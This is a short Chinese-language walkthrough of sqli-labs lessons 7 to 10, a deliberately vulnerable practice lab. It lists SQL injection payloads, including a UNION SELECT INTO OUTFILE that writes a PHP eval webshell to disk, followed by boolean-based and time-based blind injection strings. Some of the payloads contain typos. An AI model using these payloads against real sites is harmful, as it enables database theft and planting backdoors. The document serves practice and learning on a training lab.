less7-10

less7（一句话木马的利用）

首先按部就班试出

？id=1‘))–+

利用order by查出数据库列数

提示是use outfile

into outfile 是写文件的指令，资料引用csdn的大佬

利用union select 1,2,‘<?php @eval($_post[“crow”]);？>’ into outfile “D:\phpstudy_pro\WWW\sqli-labs\Less-7\a.php”–+将一句话木马写入

这里报错了没事，现在文件已经写到我们想要的地方

然后使用菜刀访问即可！

ps：操作前提该网站允许文件的读入操作，不然会一直报错且菜刀也访问不到文件。

less8

方法一 布尔盲注

输入？id=1‘判断存在注入错误

输入？id=1’ order by 3–+ 当3改成4时报错说明只有4列

输入？id=1‘and left（（database（）），1）=’s‘–+ 猜出第一位

或者采用？id=1’‘and ascii（substr（（database（）），1,1））>16

或者输入？id=1’ and ascii((select schema_name from information_schema.schemata limit 1,1)1,1)>17–+也可以回应，判断数据库名

输入？id=1‘and acii（（select table_name from information_schema.tables where table_schema=’scurity’））>115–+判断表名

输入？id=1’and ascii（（select column_name from information_schema.columns where table_name=’user’））>10–+判断表中字段。

以上语句配合burpsuite进行使用（与lesson5,6同理）。

法二 时间盲注

？id=1‘ and sleep（5）–+判断存在注入 如果可以会延迟5秒回应（对比可见延迟）

输入？id=1‘ and if(length(database())=8,1,sleep(5))–+如果为8则页面会较快的刷新，如果不为8则会延迟5秒刷新

输入？id=1’ and if（ascii（substr（select database（），1,1））>113,1,sleep(5))–+如果当前数据库的第一个字母的ascii值大于113的时候，会立刻返回结果，否则执行5秒

less 9和less 10

less9和less10中可以使用时间盲注但不可以使用布尔盲注，less10只是将单引号改成了双引号